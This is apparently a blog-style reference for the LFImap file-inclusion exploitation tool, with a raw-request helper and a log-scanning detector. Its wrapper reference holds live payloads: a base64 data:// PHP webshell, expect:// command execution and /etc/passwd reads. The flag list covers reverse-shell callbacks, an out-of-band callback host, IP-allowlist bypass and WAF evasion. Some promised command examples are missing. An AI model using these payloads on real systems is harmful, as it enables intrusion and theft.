A field-tested LFImap reference: target selection, traversal wordlists, PHP wrappers (filter/input/data/expect/file), command injection, RFI, log/proxy/cookie shaping, second-order requests, and the `PWN` placeholder. Grounded in the real argparse surface.
LFImap is the tool I reach for when I want to confirm and exploit a local file inclusion without hand-rolling every payload. It knows the standard PHP wrapper tricks, the traversal wordlists, and the OOB-callback chain, and it walks through them when you pass -a. This is the field reference for the flags that earn their keep, grouped by the task I am trying to accomplish.
Project status. Upstream LFImap is in pre-alpha; the README explicitly notes a 1.0 release is pending. The flag surface below is the one the current main branch ships, and short flags are uppercase (-U, -F, -R, -C, -D, -H, -M, -P), not lowercase. The injection-point placeholder is PWN (configurable with --placeholder).
Every flag organised by task. Copy and adapt. Based on the actual argparse surface in lfimap.py.
Target selection (short flags are UPPERCASE)
`-U 'https://target.example/index.php?page=PWN'` Single URL to test. Mark the injection point with the `PWN` placeholder (or use --placeholder to change the marker name).
`-F urls.txt` Load multiple URLs to test from a file. One URL per line.
`-R req.txt` Load a single raw HTTP request from a file. Method, headers, cookies, body preserved. Mark the injection point with `PWN`.
Request shaping
`-C 'session=abc; PHPSESSID=xyz'` HTTP session Cookie header. Required for any authenticated LFI endpoint.
`-D 'page=PWN&lang=en'` HTTP request FORM-data (POST body). Mark the injection point with `PWN`.
`-H 'X-Forwarded-For: 127.0.0.1'` Additional HTTP header (repeatable). Use for header-based injection points or to bypass IP allowlists.
`-M POST` Request method to use for testing. LFImap defaults to GET; override when the vulnerable endpoint only accepts POST or PUT.
`-P http://127.0.0.1:8080` Proxy to connect through. Burp default. Essential for inspecting what LFImap is actually sending.
`--useragent 'Mozilla/5.0 ...'` HTTP User-Agent header value (note: single word, no hyphen). The default LFImap UA is signatured by most WAFs.
`--referer 'https://target.example/'` HTTP Referer header value. Some apps gate functionality behind a same-origin Referer check.
`--placeholder PWN` Custom testing placeholder name. Default is `PWN`. Change it when `PWN` collides with literal content in your URL or body.
`--delay 250` Delay between requests, in milliseconds. Slow the run down to look human and avoid rate limits.
`--max-timeout 30` Seconds to wait for a response before giving up. Default 5. Bump on slow targets to avoid false negatives.
`--http-ok '200,302'` HTTP response codes to treat as valid. Custom non-200 success codes get LFImap to evaluate those responses too.
`--force-ssl` Force HTTPS even if the target URL/request file is HTTP.
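The `-R` request file, the `PWN` marker and the `--placeholder` collision case above are easiest to understand by walking through the substitution step yourself. The following is an added example, not LFImap's own code: it parses a Burp-style raw request, counts where the marker occurs, and refuses to inject when the marker is missing or ambiguous (the situation `--placeholder` exists to resolve). The parsing rules, the exactly-one-marker policy and the Content-Length fix-up are this example's assumptions, and the sample request is constructed.

```python
"""Raw-request placeholder substitution in the shape LFImap's -R / --placeholder
options describe.  Added example, not LFImap's own code: the parser, the
'exactly one marker' rule and the Content-Length fix-up are assumptions."""
from dataclasses import dataclass, field


@dataclass
class RawRequest:
    method: str
    target: str
    version: str
    headers: list = field(default_factory=list)   # (name, value) pairs, order preserved
    body: str = ""

    def render(self) -> str:
        """Serialise back to wire format, recomputing Content-Length for the body."""
        hdrs = [(n, v) for n, v in self.headers if n.lower() != "content-length"]
        if self.body:
            hdrs.append(("Content-Length", str(len(self.body.encode()))))
        lines = [f"{self.method} {self.target} {self.version}"]
        lines += [f"{n}: {v}" for n, v in hdrs]
        return "\r\n".join(lines) + "\r\n\r\n" + self.body


def parse_raw_request(text: str) -> RawRequest:
    """Split a Burp-style raw request file into request line, headers and body."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, version = request_line.split(" ", 2)
    headers = []
    for line in header_lines:
        if line.strip():
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return RawRequest(method, target, version, headers, body)


def marker_hits(req: RawRequest, marker: str) -> list:
    """Every occurrence of the marker: 'target', 'header:<Name>' or 'body'."""
    hits = ["target"] * req.target.count(marker)
    for name, value in req.headers:
        hits += [f"header:{name}"] * value.count(marker)
    hits += ["body"] * req.body.count(marker)
    return hits


def substitute(req: RawRequest, marker: str, payload: str) -> RawRequest:
    """Return a new request with the single marker replaced by the payload.

    Refuses when the marker is missing or occurs more than once; a literal
    'PWN' elsewhere in the request is exactly the collision --placeholder fixes."""
    hits = marker_hits(req, marker)
    if len(hits) != 1:
        raise ValueError(f"need exactly one {marker!r}, found {len(hits)}: {hits}")
    return RawRequest(
        req.method,
        req.target.replace(marker, payload),
        req.version,
        [(n, v.replace(marker, payload)) for n, v in req.headers],
        req.body.replace(marker, payload),
    )


def sample_request(marker: str) -> str:
    """Constructed raw request; the cookie's literal 'PWNED' collides with the default marker."""
    return (
        "POST /index.php HTTP/1.1\r\n"
        "Host: target.example\r\n"
        "Cookie: theme=PWNED; PHPSESSID=xyz\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 12\r\n"
        "\r\n"
        f"page={marker}&l=1"
    )


if __name__ == "__main__":
    colliding = parse_raw_request(sample_request("PWN"))
    print(marker_hits(colliding, "PWN"))          # two hits: cookie and body
    renamed = parse_raw_request(sample_request("INJ"))   # what --placeholder INJ implies
    print(substitute(renamed, "INJ", "php://input").render())
```

Run it as a script to see the collision report for the default marker, then the rewritten request once the marker is renamed; note that the rendered Content-Length follows the substituted body rather than the value in the file.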
Attack techniques (each is its own flag)
`-a` (`--all`) Use ALL supported attack methods. Filter, input, data, expect, file wrappers; path traversal; RFI; command injection; heuristics. The kitchen sink. Best first pass on a confirmed-vulnerable parameter.
`-f` (`--filter`) Attack using the php://filter wrapper. Source disclosure via base64 encoding of PHP files.
`-i` (`--input`) Attack using the php://input wrapper. POST body becomes the included content; pair with allow_url_include=On for RCE.
`-d` (`--data`) Attack using the data:// wrapper. Inline PHP via a data URI; requires allow_url_include=On.
`-e` (`--expect`) Attack using the expect:// wrapper. Runs OS commands when the expect extension is enabled (rare in production).
`-file` (`--file`) Attack using the file:// wrapper. Direct local file inclusion via the file scheme.
`-t` (`--trunc`) Path traversal attack using a wordlist (default `short.txt`). Walks `../`, `..%2f`, `....//`, and common bypasses.
`-r` (`--rfi`) Remote file inclusion. Pair with --lhost/--lport or --callback to serve the remote payload.
`-c` (`--cmd`) Custom polyglot command injection probes. Useful when the parameter ends up in both an include and a shell context.
`-heur` (`--heuristics`) Heuristic checks: XSS, CRLF, open redirect, error-based info leak. Adjacent vulnerabilities the same parameter may carry.
PHP wrapper exploitation reference
`php://filter/convert.base64-encode/resource=index.php` Source disclosure. Reads PHP files as base64 so the interpreter does not execute them. Driven by -f.
`php://input` Raw POST body becomes the included content. LFImap flips the request to POST and sends PHP source as the body. Driven by -i.
`data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4=` Inline PHP via a data URI. Requires allow_url_include=On. Driven by -d.
`expect://id` Runs OS commands via the expect wrapper. Only works when the expect extension is enabled. Driven by -e.
`file:///etc/passwd` Direct file inclusion via the file scheme. Driven by -file (the literal flag name).
Path traversal wordlist
`-wT path/to/wordlist.txt` Path to a custom wordlist for the path-traversal modality (`-t`). Defaults to `src/wordlists/short.txt`.
`--use-long` Use the bundled `src/wordlists/long.txt` wordlist instead of `short.txt`. Slower but covers more depths and bypass forms.
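The wrapper strings and traversal forms in the two sections above are also what a defender should be looking for in access logs: a scanner like this one leaves every probe it sends in the target's logs. The following is an added example, not LFImap's code, that flags those signatures on log lines after undoing (possibly double) URL encoding and decodes a base64 `data:` body to confirm it carries PHP. The regexes, the decoding depth and the sample log lines are this example's assumptions and are constructed.

```python
"""Flag LFI/RFI probe signatures in access-log lines: PHP stream wrappers,
traversal forms (including ..%2f, double-encoded ..%252f and ....//) and
inline PHP inside a data: URI.  Added example; regexes and samples constructed."""
import base64
import re
from urllib.parse import unquote

WRAPPER_RE = re.compile(r"\b(php|data|expect|file|phar|zip|glob)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|\.{4}//")
DATA_B64_RE = re.compile(r"data:(?://)?[^,\s]*;base64,([A-Za-z0-9+/=]+)", re.IGNORECASE)


def normalise(text: str, passes: int = 3) -> str:
    """Percent-decode repeatedly so ..%252f collapses to ../ the same way ..%2f does."""
    for _ in range(passes):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def decode_inline_php(text: str):
    """Return the decoded body of a base64 data: URI if one is present, else None."""
    m = DATA_B64_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def classify(line: str) -> list:
    """Labels for one log line, in order of first appearance, without duplicates."""
    decoded = normalise(line)
    labels = ["wrapper:" + m.group(1).lower() for m in WRAPPER_RE.finditer(decoded)]
    if TRAVERSAL_RE.search(decoded):
        labels.append("traversal")
    payload = decode_inline_php(decoded)
    if payload and ("<?php" in payload.lower() or "<?=" in payload):
        labels.append("inline-php")
    return list(dict.fromkeys(labels))


def scan(lines) -> dict:
    """Map line index -> labels for every line carrying at least one signature."""
    return {i: labels for i, line in enumerate(lines) if (labels := classify(line))}


# Constructed access-log lines; the third is double URL-encoded, the fourth carries
# the same base64 data: payload that the wrapper reference above lists.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9120',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=..%252f..%252f..%252fetc/passwd HTTP/1.1" 200 1480',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4= HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 404 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=expect://id HTTP/1.1" 200 31',
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_LOG).items():
        print(idx, labels)
```

The decoding loop matters more than the regexes: a single `unquote` pass misses `..%252f`, which is exactly the kind of bypass the `long.txt` wordlist exercises, and the base64 decode turns an opaque `data:` blob into readable PHP for the analyst.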
Payload options
`-n U` URL-encode payloads. Useful when the input is reflected unencoded into the include path.
`-n B` Base64-encode payloads. Pair with wrappers that decode base64 on the way in.
`-q` (`--quick`) Run with a reduced set of carefully selected payloads. Faster first pass; lower coverage.
RCE via reverse shell (-x) and OOB callback
`-x` (`--exploit`) Once RCE is reached, exploit it by sending a reverse shell to --lhost / --lport. Requires -a or an explicit RCE-capable technique flag.
`--lhost 10.0.0.5` Local IP for the reverse-shell callback. The address the target reaches back to.
`--lport 4444` Local port for the reverse-shell callback.
`--callback attacker.oastify.com` Out-of-band callback hostname. Used for RFI and command-injection detection on blind targets, where the target's HTTP/DNS lookup confirms the chain fired.
CSRF handling (beta)
`--csrf-url 'https://target.example/csrf'` URL to visit before each test to fetch a fresh anti-CSRF token.
`--csrf-method GET` HTTP method for the CSRF-token fetch.
`--csrf-param 'token'` Name of the parameter holding the anti-CSRF token. LFImap extracts it from the response and injects it into the test request.
`--csrf-data 'foo=bar'` Body data to send when the CSRF page itself requires a POST.
Second-order (stored) request
`--second-url 'https://target.example/render'` URL where the stored payload is rendered. LFImap submits to -U/-R, then fetches --second-url to evaluate the result.
`--second-method GET` Method for the second-order request. Default GET.
`--second-data 'page=PWN'` FORM-data body for the second-order request.
Output and verbosity
`--log lfimap.log` Write all requests and responses to a file. The only output sink LFImap exposes.
`-v` (`--verbose`) Print more detailed output during attacks.
`--no-stop` Do not stop using the same technique after a finding. Run every payload in the technique even when an earlier one already succeeded; useful when you want the complete oracle.
Starting points I adapt from. Mark the injection point in your URL or body with PWN (the default placeholder) so LFImap knows where to substitute its payloads.
Tune the common flags (cookie, proxy, User-Agent, delay) once and reuse them across every command. A Googlebot User-Agent usually gets you hard-blocked faster than the default; pick it only when you know the target trusts crawlers.
First pass: run every attack technique against a confirmed parameter. This is what I run before reaching for anything more targeted:
The honest summary, since both tools come up in any LFI conversation.
LFImap is Python 3 native and biased toward fast detection plus the wrapper and OOB-callback chains. Its strength is breadth in one run: -a walks every technique flag and tells you what worked. It is what I reach for first.
LFISuite is older, Python 2 in its original form, with community-maintained Python 3 forks. Its strength is the interactive shell after exploitation: once it has a working include, it gives you a pseudo-terminal that hides the URL plumbing. If you have a confirmed LFI and want to run a sequence of commands without re-typing the payload boundary every time, the LFISuite shell is genuinely nicer to live in than driving raw includes by hand.
In practice I use LFImap for discovery and the first exploitation pass, and reach for LFISuite (or just a small wrapper script around curl) when I want a comfortable command loop on a confirmed shell. Neither one obviates writing the payloads by hand when something unusual is in the way.
Every flag above is dual use. The same -a that confirms a vulnerability in your own staging environment will exfiltrate /etc/passwd or drop a reverse shell on a production host you do not own. Use these against systems you own or are explicitly authorised to test. See the path traversal explainer for the underlying mechanics and the legal-framing notes there.
Sources
Authoritative references this article was fact-checked against.
Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.